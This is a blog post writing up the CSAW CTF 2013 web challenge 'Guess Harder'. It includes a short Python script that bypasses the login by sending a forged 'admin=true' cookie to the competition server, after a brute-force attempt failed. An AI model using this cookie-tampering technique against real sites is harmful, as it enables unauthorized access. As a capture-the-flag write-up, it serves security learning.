VnutZ Domain
Copyright © 1996 - 2018 [Matthew Vea] - All Rights Reserved

2013-09-22
Featured Article

CSAW CTF 2013 - WEB 100 "Guess Harder"

[index] [301 page views]

So there's no way for anybody to play around with WEB100 "Guess Harder" after the fact since the challenge web server is shut down. The challenge provided an IP address - http://128.238.66.215 - which showed a short message to the effect of "HA! Bet you can't guess my password.", included a text box, and a submit button. When you guess wrong, the page just recycles.

Admittedly, I did this one the hard way at first by scripting a brute force routine with Python that cycled through all the entries of password dictionary. That thing ran for a long time and produced nothing so I finally opened up WireShark to take a peak. Lo and behold, within the HTTP header was a field @COOKIE: admin=false@. Could it be that easy?

 
import httplib, urllib
params = urllib.urlencode({'password' : 'password'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "Cookie": "admin=true\r\n"}
conn = httplib.HTTPConnection("128.238.66.225:80")
conn.request("POST", "/", params, headers)
response = conn.getresponse()
print response.status, response.reason, response.read()
conn.close()

Yup. Just telling the server @admin=true@ in the cookie field made it accept the entry and it provided the necessary flag.



More site content that might interest you:

Thanks D-Link for the remote administration feature - I really wanted to make sure the random IT support guy from India could access my stuff.


Try your hand at fate and use the site's continuously updating statistical analysis of the MegaMillions and PowerBall lotteries to choose "smarter" number. Remember, you don't have to win the jackpot to win money from the lottery!


Tired of social media sites mining all your data? Try a private, auto-deleting message bulletin board.